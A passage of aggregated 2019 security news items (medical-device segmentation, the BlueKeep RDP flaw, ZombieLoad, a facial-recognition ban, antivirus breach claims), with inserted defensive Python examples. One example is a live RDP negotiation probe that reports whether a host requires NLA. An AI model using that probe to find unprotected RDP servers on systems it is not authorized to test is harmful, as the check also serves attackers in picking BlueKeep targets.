Even worse, in many cases, vendors are responsible for patching themselves, and sometimes devices are connected to the network without the oversight of IT, claimed the report.

Forescout argued that VLANs could help HCOs mitigate risk by segmenting their networks. However, in half (49%) of the deployments studied, medical devices were connected to 10 VLANs or fewer, suggesting insufficient investment in this strategy.

“Our findings reveal that healthcare organizations have some of the most diverse and complex IT environments, which are compounded due to compliance risks,” argued Elisa Costante, head of OT and industrial technology innovation at Forescout.

“Every time a patch is applied, there is concern around voiding a warranty or impacting patient safety. These organizations are dealing with life-saving devices and extremely sensitive environments.”

Although there has been an explosion in OT (8%) and IoT (39%) devices in recent years, the biggest potential attack surface on medical VLANs came from regular IT devices (53%), the report claimed.
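The study's metrics (end-of-life Windows share, SMB and RDP exposure, vendor diversity per VLAN, medical devices sharing VLANs with ordinary IT hosts) can be computed from an ordinary asset export and turned into a remediation order. The following is an added example, not code from the article or from Forescout; the inventory it reads is constructed, hypothetical data in a CSV shape chosen for the example, and the scoring weights are an assumption.

```python
import csv
import io
from collections import defaultdict

# Constructed asset export in the shape a NAC or inventory tool produces
# (hypothetical hosts; not data from the Forescout study).
SAMPLE_INVENTORY = """\
host,vlan,os,vendor,device_class,open_ports
ward-pc-01,10,Windows 7,Dell,IT,135;139;445;3389
ward-pc-02,10,Windows 10,HP,IT,135;445
infusion-07,10,Embedded Linux,Baxter,Medical,80;443
imaging-ct-1,10,Windows 2008,Siemens Healthineers,Medical,21;445;3389
nurse-tablet-3,20,iOS,Apple,IoT,
hvac-ctl-2,20,VxWorks,Johnson Controls,OT,502
lab-analyzer-4,20,Windows XP,Roche,Medical,139;445
"""

EOL_JAN_2020 = {"windows 7", "windows 2008", "windows server 2008", "windows mobile"}
UNSUPPORTED = {"windows xp", "windows 2003"}
RISKY_SERVICES = {"SMB": {139, 445}, "RDP": {3389}, "FTP": {21}, "Telnet": {23}}


def load_inventory(text):
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["ports"] = {int(p) for p in row["open_ports"].split(";") if p}
        rows.append(row)
    return rows


def pct(part, whole):
    return round(100 * len(part) / len(whole)) if whole else 0


def triage(rows):
    """Compute the study's headline metrics and rank hosts by remediation priority."""
    windows = [r for r in rows if r["os"].lower().startswith("windows")]
    vendors_per_vlan = defaultdict(set)
    for r in rows:
        vendors_per_vlan[r["vlan"]].add(r["vendor"])
    metrics = {
        "unsupported_pct": pct([r for r in rows if r["os"].lower() in UNSUPPORTED], rows),
        "windows_eol_2020_pct": pct([r for r in windows if r["os"].lower() in EOL_JAN_2020], windows),
        "windows_smb_pct": pct([r for r in windows if r["ports"] & RISKY_SERVICES["SMB"]], windows),
        "windows_rdp_pct": pct([r for r in windows if r["ports"] & RISKY_SERVICES["RDP"]], windows),
        "vendors_per_vlan": {vlan: len(v) for vlan, v in vendors_per_vlan.items()},
    }
    it_vlans = {r["vlan"] for r in rows if r["device_class"] == "IT"}
    findings = []
    for r in rows:
        score, reasons = 0, []
        os_name = r["os"].lower()
        if os_name in UNSUPPORTED:
            score, reasons = score + 3, reasons + ["unsupported OS"]
        elif os_name in EOL_JAN_2020:
            score, reasons = score + 2, reasons + ["OS reaches end of life Jan 2020"]
        for service, ports in RISKY_SERVICES.items():
            if r["ports"] & ports:
                score, reasons = score + 1, reasons + [f"{service} exposed"]
        # A medical device on the same VLAN as ordinary IT hosts is the segmentation gap
        if r["device_class"] == "Medical" and r["vlan"] in it_vlans:
            score, reasons = score + 2, reasons + ["shares VLAN with IT hosts"]
        if score:
            findings.append((score, r["host"], reasons))
    findings.sort(key=lambda f: (-f[0], f[1]))
    return metrics, findings


if __name__ == "__main__":
    metrics, findings = triage(load_inventory(SAMPLE_INVENTORY))
    print(metrics)
    for score, host, reasons in findings:
        print(score, host, "; ".join(reasons))
```

The ranking puts an end-of-life imaging workstation with SMB, RDP and FTP reachable and IT neighbours on its VLAN ahead of a desktop with the same OS, which is the order the patching and segmentation constraints in the article argue for: the device that cannot easily be patched is the one to isolate first.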

Categories: Cyber Risk News


“Wormable” Bug Could Enable Another WannaCry

Info Security - Wed, 05/15/2019 - 09:31
“Wormable” Bug Could Enable Another WannaCry

Microsoft released fixes for 79 unique vulnerabilities yesterday, including 22 critical bugs — one of which could be used to spread malware around the globe.

Microsoft detailed the potential impact of CVE-2019-0708 in a separate blog post on Tuesday.

This is a flaw in Remote Desktop Services (RDS) which could allow an attacker to remotely execute arbitrary code on a target system after connecting using RDP.

Even worse, according to Microsoft, the bug is “wormable,” meaning that “any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.”

“While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware,” Microsoft warned.

Although the bug affects older operating systems — Windows 7, Windows Server 2008 R2 and Windows Server 2008 — it should be patched ASAP. Microsoft is even making fixes available for out-of-support versions XP and Windows 2003, such is the potential threat.

“CVE-2019-0708 should be the highest priority patching because, in addition to the wormable capabilities in this exploit, many modern ransomware variants, such as Dharma, Robbinhood, and CrySIS, often use vulnerable RDP servers to gain access to victim networks,” argued Recorded Future senior solutions architect, Allan Liska. “This vulnerability will make that process even easier.”
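Microsoft's advisory for CVE-2019-0708 lists enabling Network Level Authentication as a partial mitigation, because the vulnerable code is reached before a client has authenticated. The first step of an RDP connection is an X.224 Connection Request carrying an RDP Negotiation Request (MS-RDPBCGR), and the server's Connection Confirm reveals whether it will let a client proceed without CredSSP. The following is an added example, not code from the article, Microsoft or Recorded Future: it builds that request, decodes the reply and classifies the host. The server replies are constructed byte captures for offline use; `probe()` performs the live exchange against a host you are authorized to test.

```python
import socket
import struct

# Protocol flags from the RDP negotiation request/response in MS-RDPBCGR.
PROTOCOL_RDP = 0x00000000      # standard RDP security: no TLS, no NLA
PROTOCOL_SSL = 0x00000001      # TLS only
PROTOCOL_HYBRID = 0x00000002   # CredSSP, i.e. Network Level Authentication
PROTOCOL_HYBRID_EX = 0x00000008

TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03
HYBRID_REQUIRED_BY_SERVER = 0x00000005
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER", 3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS", 5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols):
    """TPKT header + X.224 Connection Request carrying an RDP Negotiation Request."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # X.224 CR body: code 0xE0, DST-REF, SRC-REF, class option, then the negotiation request
    x224_body = struct.pack(">BHHB", 0xE0, 0, 0, 0) + neg_req
    x224 = struct.pack("B", len(x224_body)) + x224_body          # LI counts everything after itself
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224       # TPKT: version 3, reserved, total length


def parse_connection_confirm(data):
    """Decode the server's X.224 Connection Confirm into ("selected", protocol) or ("failure", code)."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT packet")
    if struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("TPKT length does not match packet")
    if data[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    if data[4] == 6:
        # No negotiation payload: a legacy server that only speaks standard RDP security
        return ("selected", PROTOCOL_RDP)
    if len(data) < 19:
        raise ValueError("truncated negotiation response")
    neg_type, _flags, _length, value = struct.unpack("<BBHI", data[11:19])
    if neg_type == TYPE_RDP_NEG_RSP:
        return ("selected", value)
    if neg_type == TYPE_RDP_NEG_FAILURE:
        return ("failure", value)
    raise ValueError(f"unexpected negotiation type 0x{neg_type:02x}")


def assess_nla(response):
    """Classify the reply to a request for PROTOCOL_SSL alone.

    A server enforcing NLA cannot satisfy a TLS-only request and answers with
    HYBRID_REQUIRED_BY_SERVER; any reply that lets the client carry on without
    CredSSP means the pre-authentication code path is reachable."""
    kind, value = parse_connection_confirm(response)
    if kind == "failure":
        if value == HYBRID_REQUIRED_BY_SERVER:
            return "nla_required"
        return "refused:" + FAILURE_CODES.get(value, hex(value))
    if value in (PROTOCOL_HYBRID, PROTOCOL_HYBRID_EX):
        return "nla_required"
    return "nla_not_required"


def probe(host, port=3389, timeout=5):
    """Live check against a host you are authorized to test; not used by the offline samples."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(PROTOCOL_SSL))
        return assess_nla(sock.recv(1024))


# Constructed server replies (hypothetical byte captures, not from the article) for offline use.
REPLY_TLS_ONLY = bytes.fromhex("030000130ed000001234000200080001000000")       # NegRsp, selected TLS
REPLY_NLA_REQUIRED = bytes.fromhex("030000130ed000001234000300080005000000")   # NegFailure, code 5
REPLY_LEGACY = bytes.fromhex("0300000b06d00000123400")                          # bare CC, no NegRsp

if __name__ == "__main__":
    for name, reply in [("tls-only", REPLY_TLS_ONLY), ("nla", REPLY_NLA_REQUIRED), ("legacy", REPLY_LEGACY)]:
        print(name, assess_nla(reply))
```

A host that answers "nla_not_required" is not thereby confirmed vulnerable (the patch state is a separate question), but it is one where an unauthenticated client reaches the code path the advisory describes, so it belongs at the front of the patch queue; "nla_required" only narrows the exposure to attackers who already hold valid credentials.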

Elsewhere, IT admins should also fix a zero-day flaw (CVE-2019-0863), which is being exploited in the wild and has also been publicly disclosed, meaning other hackers could use it in their own attacks. It’s an elevation-of-privilege vulnerability in the way Windows Error Reporting handles files, which allows an attacker to gain kernel mode access to a victim system.

In addition, a publicly disclosed vulnerability in Skype for Android (CVE-2019-0932) could enable an attacker to snoop on conversations without a victim’s knowledge.

Categories: Cyber Risk News

ZombieLoad Bugs Expose Intel Machines to Data Theft

Info Security - Wed, 05/15/2019 - 09:04
ZombieLoad Bugs Expose Intel Machines to Data Theft

Researchers have discovered a major new set of vulnerabilities in nearly all post-2011 Intel chips which could enable side-channel attacks targeting sensitive information.

ZombieLoad is reminiscent of Spectre and Meltdown bugs reported in January 2018 in that it affects not only desktop and laptop machines but also cloud servers. Like them, it exploits the speculative execution process to enable attackers to steal data from the processor.

Technically known as a “data sampling attack,” it’s far from trivial to launch, but should be addressed immediately by admins as it could theoretically allow attackers to monitor a victim’s browsing in real-time, or steal sensitive credentials and data.

“While programs normally only see their own data, a malicious program can exploit the fill buffers to get hold of secrets currently processed by other running programs,” the research paper claimed. “These secrets can be user-level secrets, such as browser history, website content, user keys, and passwords, or system-level secrets, such as disk encryption keys.”

ZombieLoad (CVE-2018-12130) is the most dangerous vulnerability, although the researchers also found three others: CVE-2018-12126, CVE-2018-12127 and CVE-2019-11091. Intel calls these Microarchitectural Data Sampling (MDS) flaws.

“All of them have in common that they trigger a faulty read, and extract data used by transiently executed operations via a side-channel,” said the researchers in an accompanying blog post.

The good news is that Intel has already addressed MDS issues post-Spectre/Meltdown, so its newer chips (8th and 9th Generation Intel Core processors and 2nd Generation Intel Xeon Scalable processor family) aren’t affected.

It has also released microcode updates to address the vulnerabilities, although these could apparently have a 9% performance hit on cloud machines and around 3% on desktops and laptops. Apple, Google, and Microsoft have already released patches to fix ZombieLoad.
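On Linux, kernels carrying the MDS patches report the combined state of the kernel fix, the microcode and SMT in a documented set of strings under /sys/devices/system/cpu/vulnerabilities/mds, which is the quickest way to confirm that both the OS patch and the microcode update actually took effect on a given host. The following is an added example, not code from the article, Intel or the researchers: it parses that file's format and turns it into the action an admin still has to take. The sample strings are constructed in the documented format and are not readings from any real machine.

```python
SYSFS_MDS = "/sys/devices/system/cpu/vulnerabilities/mds"   # present on kernels carrying the MDS patches

# Constructed samples in the format the kernel documents for that file
# (Documentation/admin-guide/hw-vuln/mds.rst); none are readings from a real host.
SAMPLES = {
    "patched":      "Mitigation: Clear CPU buffers; SMT vulnerable",
    "smt_off":      "Mitigation: Clear CPU buffers; SMT disabled",
    "no_microcode": "Vulnerable: Clear CPU buffers attempted, no microcode; SMT vulnerable",
    "old_kernel":   "Vulnerable",
    "hw_fixed":     "Not affected",
}


def parse_mds_status(text):
    """Split the sysfs string into the fields an admin acts on."""
    text = text.strip()
    if text == "Not affected":
        return {"affected": False, "mitigated": True, "microcode": True, "smt": None}
    state, _, smt_part = text.partition(";")
    smt_part = smt_part.strip()
    smt = smt_part[len("SMT "):] if smt_part.startswith("SMT ") else None
    return {
        "affected": True,
        "mitigated": state.startswith("Mitigation:"),       # VERW-based buffer clearing is active
        "microcode": "no microcode" not in state,           # the CPU actually honours the clear
        "smt": smt,                                          # "vulnerable", "mitigated", "disabled", ...
    }


def verdict(status):
    """What is still missing after the OS and microcode updates."""
    if not status["affected"]:
        return "ok: hardware not affected"
    if not status["microcode"]:
        return "action: install the microcode/firmware update; the kernel fix cannot clear buffers without it"
    if not status["mitigated"]:
        return "action: kernel MDS mitigation not active (kernel too old or booted with mds=off)"
    if status["smt"] == "vulnerable":
        return "partial: mitigated, but SMT is on and sibling threads can still leak; disable SMT for untrusted workloads"
    return "ok: mitigated"


def check_live():
    """Read the real sysfs file on a Linux host; raises FileNotFoundError on kernels without the patches."""
    with open(SYSFS_MDS) as f:
        return verdict(parse_mds_status(f.read()))


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, "->", verdict(parse_mds_status(text)))
```

The "partial" case is the one that is easy to miss after patching: the buffer-clearing mitigation protects against leakage across context switches and privilege boundaries, but with hyperthreading enabled a sibling thread on the same core can still sample data, which is why the kernel keeps reporting "SMT vulnerable" until SMT is disabled.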

Categories: Cyber Risk News

San Francisco Votes to Ban Facial Recognition

Info Security - Tue, 05/14/2019 - 18:42
San Francisco Votes to Ban Facial Recognition

Lawmakers in San Francisco will vote today on legislation that would ban the use of facial recognition technology among city departments, according to NPR.

If approved, the law would make San Francisco the first city to ban the technology’s use, a ban that would extend to police body cameras. “Governments have used the technology for several years, and the software can assist with efforts to find missing children, for example, or prevent driver's license fraud,” NPR reported.

That the technology is so widely used is evidence of what happens when the pace of adoption moves too swiftly. “It’s good to see legislators and others taking technological innovations seriously – especially in terms of this one-to-many use case where facial recognition might be used to pick a face out of a crowd,” said Sam Bakken, senior product marketing manager at OneSpan.

“It’s important to remember though that one-to-one use cases such as that facilitated by Apple Face ID and other technology whereby a user willingly enrolls in the system to allow them to unlock their phone or log into other accounts using their face makes it easy and convenient for consumers to add an additional layer of security to their mobile devices and accounts.”

The proposed legislation is intended to address those instances where individuals are not consenting to have their images included in a database, but not all experts agree that the move to ban the technology is a step in the right direction.

“This is backwards thinking when it comes to public safety and an equally illogical argument could be made against using fingerprints and DNA evidence, which are also left behind without intent or permission but are instrumental in providing leads that solve countless crimes and bring violent criminals to justice. We have a constitutional presumption of innocence that protects us. If facial recognition or fingerprint matching or DNA testing provides clues to law enforcement agencies, they should not be barred from following up on them," said John Gunn, CMO, OneSpan.

Categories: Cyber Risk News

Speculators Look to ID AVs Hacked by Russia

Info Security - Tue, 05/14/2019 - 18:15
Speculators Look to ID AVs Hacked by Russia

Last week Infosecurity Magazine reported on threat intelligence published by Advanced Intelligence (AdvIntel) claiming that three US antivirus companies had been hacked by a top-tier Russian hacking collective.

While the original research did not identify the impacted companies, both Gizmodo and Bleeping Computer have reported that McAfee, Symantec and Trend Micro are the three companies in question.

Though it does try to adhere to the general rule of not discussing victim entities, an AdvIntel spokesperson said in an email, “Given the latest independent corroboration and publication, we can confirm that Trend Micro and McAfee were two of the companies that were claimed to be breached by the actor group with their internal access and data for sale.”

Trend Micro has confirmed that an unauthorized third party accessed a single testing lab network. “We have an active investigation underway related to recent claims, and while it is not complete, we want to transparently share what we have learned. Working closely with law enforcement, our global threat research and forensic teams are leading this investigation,” a Trend Micro spokesperson wrote in an email.

“Some low-risk debugging related information was obtained. We are nearing the end of our investigation and at this time we have seen no indication that any customer data nor source code were accessed or exfiltrated. Immediate action was taken to quarantine the lab and additionally secure all corresponding environments. Due to the active nature of the investigation, we are not in a position to share any additional information, but we will provide an update when additional insights become available and can be disclosed.”

A McAfee spokesperson wrote, “McAfee has been conducting a thorough investigation into these claims. To date, we’ve found no indication that McAfee products, services or networks have been impacted by the campaign described.”

AdvIntel said that it had reached out to all of the purported victims, as well as law enforcement, regarding Fxmsp well before its initial blog was released. Though the company did not comment on whether Symantec was one of the breached companies, there has been speculation that Symantec is the third victim.

Symantec said it is aware of recent claims that a number of US-based antivirus companies were breached, and a spokesperson said, “We have been in contact with researchers at AdvIntel, who confirmed that Symantec (Norton) has not been impacted. We do not believe there is reason for our customers to be concerned.”

*AdvIntel admitted in a message to Computer Business Review that Fxmsp had not provided “sufficient evidence to support this allegation [that Symantec was hacked].” The company added: “We believe with a high degree of confidence that Symantec’s assessment of risks and their statement that ‘there is no reason for our [Symantec] customers to be concerned currently’ is correct.”

*Updated May 15 to include statement from CBR shared with Infosecurity by Symantec.

Categories: Cyber Risk News
